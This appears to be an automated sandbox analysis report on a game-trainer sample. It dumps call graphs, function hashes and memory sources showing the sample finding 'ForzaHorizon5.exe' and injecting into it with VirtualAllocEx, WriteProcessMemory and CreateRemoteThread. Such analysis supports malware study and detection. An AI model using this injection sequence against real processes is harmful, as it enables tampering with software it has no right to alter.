3725 7ff8b8f73a46 3724->3725 3726 7ff8b8f73b5b _CxxThrowException 3725->3726 3727 7ff8b8f73a57 WriteProcessMemory WriteProcessMemory 3725->3727 3727->3708 3728 7ff8b8f73abd 3727->3728 3728->3698 3728->3701 3730 7ff8b8f74e0a RtlLookupFunctionEntry 3729->3730 3731 7ff8b8f74d47 3730->3731 3732 7ff8b8f74e20 RtlVirtualUnwind 3730->3732 3733 7ff8b8f74ce8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3731->3733 3732->3730 3732->3731 3831 7ff8b8f71910 3837 7ff8b8f71919 3831->3837 3861 7ff8b8f71c97 3831->3861 3832 7ff8b8f74150 6 API calls 3832->3837 3833 7ff8b8f73f70 45 API calls 3833->3837 3834 7ff8b8f719fc 3836 7ff8b8f74920 4 API calls 3834->3836 3835 7ff8b8f73f50 45 API calls 3835->3837 3838 7ff8b8f71a06 VirtualAllocEx WriteProcessMemory 3836->3838 3837->3832 3837->3833 3837->3834 3837->3835 3842 7ff8b8f71cf6 3837->3842 3843 7ff8b8f71d11 _invalid_parameter_noinfo_noreturn 3837->3843 3846 7ff8b8f71cfe 3837->3846 3839 7ff8b8f74920 4 API calls 3838->3839 3840 7ff8b8f71a83 VirtualAllocEx WriteProcessMemory 3839->3840 3841 7ff8b8f74920 4 API calls 3840->3841 3845 7ff8b8f71b09 VirtualAllocEx WriteProcessMemory CreateRemoteThread 3841->3845 3844 7ff8b8f74918 free 3842->3844 3843->3831 3844->3846 3847 7ff8b8f74920 4 API calls 3845->3847 3848 7ff8b8f71bab WaitForSingleObject 3847->3848 3849 7ff8b8f74918 free 3848->3849 3850 7ff8b8f71be1 VirtualFreeEx 3849->3850 3851 7ff8b8f74918 free 3850->3851 3852 7ff8b8f71c05 VirtualFreeEx 3851->3852 3853 7ff8b8f74918 free 3852->3853 3854 7ff8b8f71c2a VirtualFreeEx 3853->3854 3855 7ff8b8f74918 free 3854->3855 3856 7ff8b8f71c4f 3855->3856 3857 7ff8b8f71c8b 3856->3857 3859 7ff8b8f71c80 3856->3859 3862 7ff8b8f71c79 _invalid_parameter_noinfo_noreturn 3856->3862 3858 7ff8b8f74570 8 API calls 3857->3858 3858->3861 3860 7ff8b8f74918 free 3859->3860 3860->3857 3862->3859 3966 7ff8b8f75750 3967 7ff8b8f75799 3966->3967 3968 7ff8b8f75762 3966->3968 3968->3967 3969 7ff8b8f75791 3968->3969 3971 7ff8b8f757c5 _invalid_parameter_noinfo_noreturn 3968->3971 3970 7ff8b8f74918 free 3969->3970 3970->3967 3778 7ff8b8f74658 3779 7ff8b8f7467c __scrt_acquire_startup_lock 3778->3779 3780 7ff8b8f75360 _seh_filter_dll 3779->3780 3781 7ff8b8f71460 __std_exception_copy 3796 7ff8b8f712a0 3797 7ff8b8f712df 3796->3797 3798 7ff8b8f712b3 3796->3798 3799 7ff8b8f712d7 3798->3799 3800 7ff8b8f712f8 _invalid_parameter_noinfo_noreturn __std_exception_copy 3798->3800 3801 7ff8b8f74918 free 3799->3801 3801->3797 3802 7ff8b8f724a0 3803 7ff8b8f724f9 3802->3803 3804 7ff8b8f724b0 WriteProcessMemory 3802->3804 3810 7ff8b8f710c0 3803->3810 3804->3803 3805 7ff8b8f724e8 free 3804->3805 3805->3803 3808 7ff8b8f7253c 3809 7ff8b8f72511 WriteProcessMemory 3809->3808 3811 7ff8b8f710df 7 API calls 3810->3811 3812 7ff8b8f71297 3810->3812 3813 7ff8b8f71230 WriteProcessMemory 3811->3813 3814 7ff8b8f71261 WriteProcessMemory 3811->3814 3812->3808 3812->3809 3813->3814 3814->3812 3826 7ff8b8f744e0 3827 7ff8b8f744f2 ?_Xbad_function_call@std@ 3826->3827 3829 7ff8b8f744f9 3826->3829 3827->3829 3828 7ff8b8f74918 free 3830 7ff8b8f74529 3828->3830 3829->3828 3863 7ff8b8f72720 3917 7ff8b8f73020 3863->3917 3867 7ff8b8f72809 3868 7ff8b8f7284e 3867->3868 3869 7ff8b8f72849 3867->3869 3870 7ff8b8f72842 _invalid_parameter_noinfo_noreturn 3867->3870 3873 7ff8b8f72919 3868->3873 3931 7ff8b8f72ff0 3868->3931 3871 7ff8b8f74918 free 3869->3871 3870->3869 3871->3868 3874 7ff8b8f73dd0 49 API calls 3873->3874 3875 7ff8b8f72952 3874->3875 3876 7ff8b8f729a0 3875->3876 3877 7ff8b8f7299b 3875->3877 3878 7ff8b8f72994 _invalid_parameter_noinfo_noreturn 3875->3878 3881 7ff8b8f72a5a 3876->3881 3934 7ff8b8f72fc0 3876->3934 3879 7ff8b8f74918 free 3877->3879 3878->3877 3879->3876 3882 7ff8b8f73dd0 49 API calls 3881->3882 3883 7ff8b8f72a92 3882->3883 3884 7ff8b8f72ae0 3883->3884 3886 7ff8b8f72adb 3883->3886 3889 7ff8b8f72ad4 _invalid_parameter_noinfo_noreturn 3883->3889 3937 7ff8b8f72f90 3884->3937 3887 7ff8b8f74918 free 3886->3887 3887->3884 3889->3886 3890 7ff8b8f73dd0 49 API calls 3891 7ff8b8f72b59 ReadProcessMemory 3890->3891 3892 7ff8b8f72ba5 3891->3892 3893 7ff8b8f72be0 3891->3893 3894 7ff8b8f72bdb 3892->3894 3896 7ff8b8f72bd4 _invalid_parameter_noinfo_noreturn 3892->3896 3898 7ff8b8f72c4b 3893->3898 3940 7ff8b8f72f60 3893->3940 3897 7ff8b8f74918 free 3894->3897 3896->3894 3897->3893 3899 7ff8b8f73dd0 49 API calls 3898->3899 3900 7ff8b8f72c82 3899->3900 3901 7ff8b8f72cc7 ReadProcessMemory 3900->3901 3903 7ff8b8f72cc2 3900->3903 3904 7ff8b8f72cbb _invalid_parameter_noinfo_noreturn 3900->3904 3902 7ff8b8f72d71 3901->3902 3908 7ff8b8f72d76 3901->3908 3943 7ff8b8f72f30 3902->3943 3905 7ff8b8f74918 free 3903->3905 3904->3903 3905->3901 3907 7ff8b8f73dd0 49 API calls 3909 7ff8b8f72db2 ReadProcessMemory 3907->3909 3908->3907 3910 7ff8b8f72dfe 3909->3910 3911 7ff8b8f72e38 3909->3911 3912 7ff8b8f72e33 3910->3912 3914 7ff8b8f72e2c _invalid_parameter_noinfo_noreturn 3910->3914 3913 7ff8b8f74570 8 API calls 3911->3913 3915 7ff8b8f74918 free 3912->3915 3916 7ff8b8f72e4b 3913->3916 3914->3912 3915->3911 3946 7ff8b8f73050 3917->3946 3919 7ff8b8f727d9 3920 7ff8b8f73dd0 3919->3920 3921 7ff8b8f73edd 3920->3921 3924 7ff8b8f73e1f 3920->3924 3922 7ff8b8f73ee9 free 3921->3922 3923 7ff8b8f73ef2 3921->3923 3922->3923 3923->3867 3924->3921 3925 7ff8b8f73e5f ReadProcessMemory 3924->3925 3926 7ff8b8f73e4c malloc 3924->3926 3927 7ff8b8f73e43 free 3924->3927 3928 7ff8b8f73f1e 3924->3928 3925->3924 3926->3925 3927->3926 3929 7ff8b8f73f50 45 API calls 3928->3929 3930 7ff8b8f73f23 3929->3930 3930->3867 3932 7ff8b8f73050 46 API calls 3931->3932 3933 7ff8b8f73016 3932->3933 3933->3873 3935 7ff8b8f73050 46 API calls 3934->3935 3936 7ff8b8f72fe6 3935->3936 3936->3881 3938 7ff8b8f73050 46 API calls 3937->3938 3939 7ff8b8f72b29 3938->3939 3939->3890 3941 7ff8b8f73050 46 API calls 3940->3941 3942 7ff8b8f72f86 3941->3942 3942->3898 3944 7ff8b8f73050 46 API calls 3943->3944 3945 7ff8b8f72f56 3944->3945 3945->3908 3947 7ff8b8f73078 3946->3947 3954 7ff8b8f730b0 3946->3954 3949 7ff8b8f730c5 3947->3949 3951 7ff8b8f7311d 3947->3951 3952 7ff8b8f730a6 3947->3952 3957 7ff8b8f73122 3947->3957 3948 7ff8b8f73180 45 API calls 3950 7ff8b8f73128 3948->3950 3953 7ff8b8f74920 4 API calls 3949->3953 3949->3954 3950->3919 3955 7ff8b8f71400 Concurrency::cancel_current_task __std_exception_copy 3951->3955 3956 7ff8b8f74920 4 API calls 3952->3956 3953->3954 3954->3919 3955->3957 3958 7ff8b8f730ab 3956->3958 3957->3948 3958->3954 3959 7ff8b8f730be _invalid_parameter_noinfo_noreturn 3958->3959 3959->3949 3972 7ff8b8f71360 __std_exception_destroy 3973 7ff8b8f71388 3972->3973 3974 7ff8b8f71395 3972->3974 3975 7ff8b8f74918 free 3973->3975 3975->3974 4007 7ff8b8f715e0 4009 7ff8b8f715fd 4007->4009 4010 7ff8b8f7167c 4007->4010 4008 7ff8b8f716e6 4012 7ff8b8f7170d _invalid_parameter_noinfo_noreturn 4008->4012 4009->4010 4009->4012 4014 7ff8b8f74918 free 4009->4014 4011 7ff8b8f716af 4010->4011 4015 7ff8b8f74918 free 4010->4015 4011->4008 4011->4012 4013 7ff8b8f74918 free 4011->4013 4013->4008 4014->4009 4015->4010 3735 7ff8b8f75428 3736 7ff8b8f75460 __GSHandlerCheckCommon 3735->3736 3737 7ff8b8f7548c 3736->3737 3738 7ff8b8f7547b __CxxFrameHandler4 3736->3738 3738->3737 3815 7ff8b8f74ca8 3816 7ff8b8f74cc9 3815->3816 3817 7ff8b8f74cc4 3815->3817 3819 7ff8b8f751b0 3817->3819 3820 7ff8b8f75247 3819->3820 3821 7ff8b8f751d3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 3819->3821 3820->3816 3821->3820 3739 7ff8b8f72230 CreateToolhelp32Snapshot 3740 7ff8b8f723fb strcpy_s 3739->3740 3741 7ff8b8f72285 Process32First 3739->3741 3743 7ff8b8f72550 2 API calls 3740->3743 3742 7ff8b8f7229b 3741->3742 3742->3740 3745 7ff8b8f722b9 3742->3745 3746 7ff8b8f722a9 Process32Next 3742->3746 3744 7ff8b8f72415 3743->3744 3748 7ff8b8f72469 free 3744->3748 3749 7ff8b8f723f6 3744->3749 3747 7ff8b8f74920 4 API calls 3745->3747 3746->3742 3750 7ff8b8f722c3 3747->3750 3748->3749 3751 7ff8b8f74570 8 API calls 3749->3751 3753 7ff8b8f71720 67 API calls 3750->3753 3752 7ff8b8f72486 3751->3752 3758 7ff8b8f722fa 3753->3758 3754 7ff8b8f72372 3754->3740 3755 7ff8b8f7237b GetForegroundWindow GetWindowThreadProcessId 3754->3755 3760 7ff8b8f723a0 3755->3760 3756 7ff8b8f72355 3757 7ff8b8f74918 free 3756->3757 3757->3754 3758->3754 3758->3756 3759 7ff8b8f7234d 3758->3759 3762 7ff8b8f723b9 _invalid_parameter_noinfo_noreturn 3758->3762 3763 7ff8b8f74918 free 3759->3763 3761 7ff8b8f723e3 3760->3761 3764 7ff8b8f723d7 strcpy_s 3760->3764 3761->3749 3765 7ff8b8f736e0 52 API calls 3761->3765 3762->3760 3763->3756 3764->3761 3765->3749 3770 7ff8b8f71030 3771 7ff8b8f74920 4 API calls 3770->3771 3772 7ff8b8f7103e 3771->3772 3782 7ff8b8f72e70 3783 7ff8b8f72e81 3782->3783 3787 7ff8b8f72eb4 3782->3787 3784 7ff8b8f72eac 3783->3784 3785 7ff8b8f72ec7 _invalid_parameter_noinfo_noreturn 3783->3785 3786 7ff8b8f74918 free 3784->3786 3786->3787 3822 7ff8b8f744b0 3823 7ff8b8f744be 3822->3823 3824 7ff8b8f744c8 3822->3824 3825 7ff8b8f74918 free 3823->3825 3825->3824 4002 7ff8b8f713b0 __std_exception_destroy 4019 7ff8b8f725f0 4020 7ff8b8f74920 4 API calls 4019->4020 4025 7ff8b8f72644 CreateThread 4020->4025 4022 7ff8b8f726d6 4026 7ff8b8f74570 8 API calls 4022->4026 4023 7ff8b8f726d1 4028 7ff8b8f73da0 4023->4028 4025->4022 4025->4023 4027 7ff8b8f7270a 4026->4027 4029 7ff8b8f73db3 CloseHandle 4028->4029 4030 7ff8b8f73dc1 4028->4030 4029->4030 4030->4022

                                                                          Executed Functions

                                                                          Function 00007FF848A51A48 Relevance: 20.8, Strings: 15, Instructions: 2026COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 7ff848a51a48-7ff848a52d3f call 7ff848a50dd8 call 7ff848a50de8 * 3 call 7ff848a50d38 call 7ff848a50d48 call 7ff848a50d58 call 7ff848a50d78 call 7ff848a50de8 * 8 call 7ff848a50d38 call 7ff848a50d48 call 7ff848a50d58 call 7ff848a50d78 call 7ff848a50df8 call 7ff848a50d38 call 7ff848a50d48 call 7ff848a50d58 call 7ff848a50d78 call 7ff848a50d98 call 7ff848a50e08 call 7ff848a50d38 call 7ff848a50db8 call 7ff848a50d48 call 7ff848a50d58 call 7ff848a50d78 call 7ff848a50dc8 call 7ff848a50d38 call 7ff848a50db8 call 7ff848a50e18 call 7ff848a50d48 call 7ff848a50d58 call 7ff848a50d78 call 7ff848a50dc8 call 7ff848a50d38 call 7ff848a50db8 call 7ff848a50e18 call 7ff848a50d48 call 7ff848a50d58 call 7ff848a50d78 call 7ff848a50dc8 call 7ff848a50d38 call 7ff848a50d48 call 7ff848a50d58 call 7ff848a50d78 call 7ff848a50d98 call 7ff848a50e08 call 7ff848a50d38 call 7ff848a50d48 call 7ff848a50d58 call 7ff848a50d78 call 7ff848a50d98 call 7ff848a50e08 call 7ff848a50de8 * 3 call 7ff848a50d38 call 7ff848a50d48 call 7ff848a50d58 call 7ff848a50d78 call 7ff848a50df8 call 7ff848a50d38 call 7ff848a50d48 call 7ff848a50d58 call 7ff848a50d78 call 7ff848a50e28 call 7ff848a50e38 call 7ff848a50d38 call 7ff848a50d48 call 7ff848a50d58 call 7ff848a50d78 call 7ff848a50e48 call 7ff848a50de8 call 7ff848a50d38 call 7ff848a50d48 call 7ff848a50d58 call 7ff848a50d78 call 7ff848a50df8 call 7ff848a50d38 call 7ff848a50d48 call 7ff848a50d58 call 7ff848a50d78 call 7ff848a50d98 call 7ff848a50e58 call 7ff848a50e68 call 7ff848a50e58 call 7ff848a50e68 call 7ff848a50e58 call 7ff848a50e68 call 7ff848a50e58 call 7ff848a50d38 call 7ff848a50d48 call 7ff848a50d58 call 7ff848a50d78 call 7ff848a50d98 call 7ff848a50e08 292 7ff848a52d51-7ff848a52d56 0->292 293 7ff848a52d41-7ff848a52d48 0->293 294 7ff848a52d58 292->294 295 7ff848a52d69-7ff848a52dd3 call 7ff848a50e88 call 7ff848a50e98 call 7ff848a50de8 * 2 292->295 296 7ff848a52d5a 293->296 297 7ff848a52d4a-7ff848a52d50 293->297 294->296 299 7ff848a52dd6-7ff848a52df9 295->299 298 7ff848a52d5c-7ff848a52d67 call 7ff848a50e78 296->298 296->299 297->292 298->295 305 7ff848a52dfb-7ff848a52e0e 299->305 306 7ff848a52e15-7ff848a52e7f call 7ff848a50ea8 call 7ff848a50d48 299->306 305->306 324 7ff848a52e99-7ff848a52ee8 306->324 325 7ff848a52e81-7ff848a52e97 306->325 332 7ff848a52eec-7ff848a52ef7 324->332 325->324 334 7ff848a52ef9-7ff848a52f0f 332->334 335 7ff848a52f11-7ff848a52f42 332->335 334->335 340 7ff848a52f43-7ff848a52f45 335->340 340->332 341 7ff848a52f47-7ff848a52f4c 340->341 341->340 343 7ff848a52f4e-7ff848a52f6f 341->343 346 7ff848a52f89-7ff848a53019 call 7ff848a50eb8 call 7ff848a50ec8 call 7ff848a50eb8 * 2 call 7ff848a50ec8 343->346 347 7ff848a52f71-7ff848a52f87 343->347 362 7ff848a5301e-7ff848a530c3 call 7ff848a50eb8 call 7ff848a50ec8 call 7ff848a50eb8 call 7ff848a50ec8 call 7ff848a50eb8 call 7ff848a50ec8 346->362 347->346
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3437756339.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff848a50000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 7>$(7>$07>$07>$87>$@7>$H7>$P7>$X7>$`7>$h7>$p7>$x7>$6>$6>
                                                                          • API String ID: 0-1683680722
                                                                          • Opcode ID: 7ca336ed1c50f67977f0ed2c77295aed2f88c2d9085aacda64071dd3ed6ccfef
                                                                          • Instruction ID: 1e944464d282e151dae633e07f9ca78049c7cd611f392e06547e47ed8f5b35d9
                                                                          • Opcode Fuzzy Hash: 7ca336ed1c50f67977f0ed2c77295aed2f88c2d9085aacda64071dd3ed6ccfef
                                                                          • Instruction Fuzzy Hash: B3F26D30619B458FD799EF28C045BAAB7E2FF89344F5045BDE04EC72A6CB75A881CB05
                                                                          Function 00007FF8B8F72010 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137processstringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3438062399.00007FF8B8F71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8F70000, based on PE: true
                                                                          • Associated: 00000006.00000002.3438034254.00007FF8B8F70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438111984.00007FF8B8F76000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438142825.00007FF8B8F78000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000006.00000002.3438167519.00007FF8B8F79000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff8b8f70000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID: Process32$CreateFirstNextSnapshotToolhelp32strcmp
                                                                          • String ID: ForzaHorizon5.exe
                                                                          • API String ID: 2015246625-4184888841
                                                                          • Opcode ID: 7359882a146a30dbad1e41fb6eb8441f01d5a7ba2dc1f03e1a21fda49bb60f06
                                                                          • Instruction ID: 2e963e057127ddb75dc5420ff2d9c61d9aaf72680d711ef4ff14d7e5d1be532d
                                                                          • Opcode Fuzzy Hash: 7359882a146a30dbad1e41fb6eb8441f01d5a7ba2dc1f03e1a21fda49bb60f06
                                                                          • Instruction Fuzzy Hash: 0051383AA08F8282FA508F29E8502697BA4FB89FD2F088531DB5E47364DF3CD546C754
                                                                          Function 00007FF848A51525 Relevance: .4, Instructions: 429COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3437756339.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff848a50000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0b6c402ee90a6c8397ae5181ce7b8bac5f5dc6390accedf613b12ac02f94eca1
                                                                          • Instruction ID: b42fdded270efc6cac8076be131251eda8fdbef007864368a1b1c50eff17abba
                                                                          • Opcode Fuzzy Hash: 0b6c402ee90a6c8397ae5181ce7b8bac5f5dc6390accedf613b12ac02f94eca1
                                                                          • Instruction Fuzzy Hash: A8F15B30609B458FD399EF28C455BAAB7E2FF89344F5044BEE04EC7296CB35A881CB05
                                                                          Function 00007FF848A5132F Relevance: .1, Instructions: 131COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3437756339.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff848a50000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d840da99b8d1497be3073283cd9cc6c32e3c76def0fa84ff9c90c0e1eac52d50
                                                                          • Instruction ID: 01c1332fecd8c41dc7abd6da965fb982e91ca9ec36ffc0b60b8fa3f8d94e0dd5
                                                                          • Opcode Fuzzy Hash: d840da99b8d1497be3073283cd9cc6c32e3c76def0fa84ff9c90c0e1eac52d50
                                                                          • Instruction Fuzzy Hash: 7E41C111F2DE4A4FEA98FA3854A66F9A3A2FFA8390F40157DC01FC3197DD68A8454380
                                                                          Function 00007FF848A545A1 Relevance: .1, Instructions: 98COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 533 7ff848a545a1-7ff848a5462f call 7ff8b8f72010 537 7ff848a54631-7ff848a5463c 533->537 538 7ff848a5463e 537->538 539 7ff848a54644-7ff848a5466f 537->539 538->539
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3437756339.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff848a50000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d3d1f9877f653194b53fc98fb9ed0e5d11ece114cb1c55642ba6122614a21c88
                                                                          • Instruction ID: d9fad7a42eaa03ced9c5e4802772d2538ad134866e42f0cc1c0b037779539294
                                                                          • Opcode Fuzzy Hash: d3d1f9877f653194b53fc98fb9ed0e5d11ece114cb1c55642ba6122614a21c88
                                                                          • Instruction Fuzzy Hash: FB219E7190CB588FDB68DF58984AAEABBE0EB65321F00416FD049C3152DA64A849CB51
                                                                          Function 00007FF848A51118 Relevance: .1, Instructions: 89COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 541 7ff848a51118-7ff848a511be call 7ff848a507e0 555 7ff848a511c3-7ff848a511e6 541->555
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3437756339.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff848a50000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 89bdb2ee61b4d804c8c50cb70c0ec6942b8b81a193b3ef731639bfbef9f5d2bd
                                                                          • Instruction ID: 40ae64b3e97d3bb5a828cb9cb97eaa59d02d32474f0ab8924070c3ec12df48ec
                                                                          • Opcode Fuzzy Hash: 89bdb2ee61b4d804c8c50cb70c0ec6942b8b81a193b3ef731639bfbef9f5d2bd
                                                                          • Instruction Fuzzy Hash: E7212862E2ED461FF698F938544A2B997E2FF64794F04007DC00ED3186DE68AC464315
                                                                          Function 00007FF848A50795 Relevance: .1, Instructions: 83COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3437756339.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff848a50000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 74ce5f0f4c612e19eb6bb8db2cef251dc5e008c04730e40243d323983e2751de
                                                                          • Instruction ID: 854ccfb57ab0acc274b807b5fa44ae3e8b52d4b3eb8af03cc28b66d0a249df1e
                                                                          • Opcode Fuzzy Hash: 74ce5f0f4c612e19eb6bb8db2cef251dc5e008c04730e40243d323983e2751de
                                                                          • Instruction Fuzzy Hash: 97219A62D0FAC74FF315FA38447B164BFD1EF226A0F0941FAC4998B0D3EA5868458366
                                                                          Function 00007FF848A510CD Relevance: .1, Instructions: 82COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3437756339.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff848a50000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d835d4bd9be4d9c1009b4b23aa47ec434c48b3f820717ff88dce7d226b1766ff
                                                                          • Instruction ID: 45edf5149beda266115c6218178409303126d97f7419d663d7df353b38c749f8
                                                                          • Opcode Fuzzy Hash: d835d4bd9be4d9c1009b4b23aa47ec434c48b3f820717ff88dce7d226b1766ff
                                                                          • Instruction Fuzzy Hash: 5B110862E2E9461FF688FA38445A2B997E3FF64798F4400BDC00FD3282DD68A8864315
                                                                          Function 00007FF848A507C5 Relevance: .1, Instructions: 80COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3437756339.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff848a50000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e540216b07d45aa2eb85eab530717be1319d7ab92847f076aecbad5ba4774ada
                                                                          • Instruction ID: 84d821c9432232f61a001a7a25ab55c386df616deebbc59e577d3e2c75edd52d
                                                                          • Opcode Fuzzy Hash: e540216b07d45aa2eb85eab530717be1319d7ab92847f076aecbad5ba4774ada
                                                                          • Instruction Fuzzy Hash: 99217962D1FA864FF355FA38487B164BFD1EF22660B0941F6C4458B0E3EA54584583A6
                                                                          Function 00007FF848A54505 Relevance: .1, Instructions: 71COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 611 7ff848a54505-7ff848a54548 call 7ff848a543f0 616 7ff848a5454d-7ff848a5454f 611->616 617 7ff848a54566-7ff848a5459c 616->617 618 7ff848a54551-7ff848a54563 616->618 618->617
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3437756339.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff848a50000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86e2c8d447a3760645be656e98f2ce0784cd969823213708309596675c0e2b49
                                                                          • Instruction ID: f4b90019e0615f62c37fb9e45417e9fb4ef562baf6f7294e8902783863ac47a1
                                                                          • Opcode Fuzzy Hash: 86e2c8d447a3760645be656e98f2ce0784cd969823213708309596675c0e2b49
                                                                          • Instruction Fuzzy Hash: EF216D6190FBD58FD756EB3C98292A07FB1EF17644B0A01EBC489CF1A3D6585C89C362
                                                                          Function 00007FF848A50875 Relevance: .0, Instructions: 39COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 622 7ff848a50875-7ff848a508bc call 7ff848a50490 629 7ff848a508c3-7ff848a508c9 622->629
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3437756339.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff848a50000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d927a466f7b3571142b9d6c8608128f6a0d43e211ce4561ece7f0857bb403f36
                                                                          • Instruction ID: 1aa840bb3c7bb65a44b5aded887cae1511892f24ac39b50a87b6b050a4fe5d17
                                                                          • Opcode Fuzzy Hash: d927a466f7b3571142b9d6c8608128f6a0d43e211ce4561ece7f0857bb403f36
                                                                          • Instruction Fuzzy Hash: 77F09001E0EA821EF36BB23828631BC7FA19F42550F0905F7D089CA5D3D94C28854366
                                                                          Function 00007FF848A51239 Relevance: .0, Instructions: 33COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 630 7ff848a51239 call 7ff848a50810 632 7ff848a5123e-7ff848a5128a call 7ff848a50820 630->632
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3437756339.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ff848a50000_Stand_Trainer_Updated.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fe4eb211c12129fdbffab525776a27d3b1527734286ffabe2ed52af056bfc8d6
                                                                          • Instruction ID: 2f6fd081e67839014f1d3ce2947c9d6741b2357748d7592d821d858c071b4ad8
                                                                          • Opcode Fuzzy Hash: fe4eb211c12129fdbffab525776a27d3b1527734286ffabe2ed52af056bfc8d6
                                                                          • Instruction Fuzzy Hash: 0FF0A062E1DA4A0FE798FA3844976B9A2E2EFA8780F004539D51FC3183DD6CA8854244

                                                                          Non-executed Functions

                                                                          Function 00007FF8B8F73180 Relevance: 26.9, APIs: 12, Strings: 3, Instructions: 663injectionmemoryCOMMON
